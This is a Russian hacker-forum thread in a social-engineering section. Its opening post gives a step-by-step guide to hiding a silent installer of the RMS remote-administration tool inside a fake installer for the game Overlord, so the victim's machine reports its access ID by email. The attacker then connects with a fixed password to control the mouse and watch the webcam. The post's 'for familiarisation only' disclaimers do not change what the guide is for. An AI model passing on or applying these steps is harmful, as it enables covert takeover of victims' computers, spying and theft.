Хакерский форум Xakarders.ru

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » Хакерский форум Xakarders.ru » Социальная инженерия » ВИРУС ЗАМАСКИРОВАННЫЙ ПОД RMS(ТИХАЯ УСТАНОВКА)

ВИРУС ЗАМАСКИРОВАННЫЙ ПОД RMS(ТИХАЯ УСТАНОВКА)

Сообщений 1 страница 3 из 3

1

Знаешь как получить удаленный доступ к компьютеру?нет?Тогда вот тебе инструкция как это сделать.Мы будем получать удаленный доступ под видом установщика игры Overlord
СКАЧИВАНИЕ НЕ ЗАНИМАЕТ БОЛЬШЕ 40 СЕКУНД проверено МНОЮ самим
для СКАЧИВАНИЯ ПОДТВЕРДИТЕ ЧТО ВЫ НЕ РОБОТ!
Вся информация предоставлена лишь с целью ознакомления. Незаконная модификация, распространение и создание вирусов карается законом. Я лишь показываю метод тихой установки.
В противном случае ответственность будете нести только вы!
1)Скачай 2 файла из https://goo.gl/oCR3Ty
2)Открой "Email[rat-club.ru].exe" и введи туда эл.адрес(позже обьясню зачем)
3)Нажми "Сохранить" и у тебя откроется папка с regedit.reg(скопируй ее)
4)Открой "Overlord" через winrar/7zip и вставь туда regedit.reg
5)Готово!
КАК ЭТО ВСЕ РАБОТАЕТ?
RMS это офф программа для управления компьютерами удаленно.В файле Overlord находяться установщик RMS,который при открытии этого файла с помощью install.bat
устанавливается без уведомлений
Так зачем нужен regedit.reg?На указанный адрес придет сообщение от "info" в котором будет указан пароль(далее скажу зачем)
Скачивайте RMS viewer из офф сайта и устанавливаете
Нажимаете "Добавить устройство" и в оба поля вводите id который пришел на почту
Пароль 12345
Готово!Вы можете управлять мышью,просматривать вебку и т.д
Вся информация предоставлена лишь с целью ознакомления. Незаконная модификация, распространение и создание вирусов карается законом. Я лишь показываю метод тихой установки.

0

2

0

3

не работает ссылка

0

Вы здесь » Хакерский форум Xakarders.ru » Социальная инженерия » ВИРУС ЗАМАСКИРОВАННЫЙ ПОД RMS(ТИХАЯ УСТАНОВКА)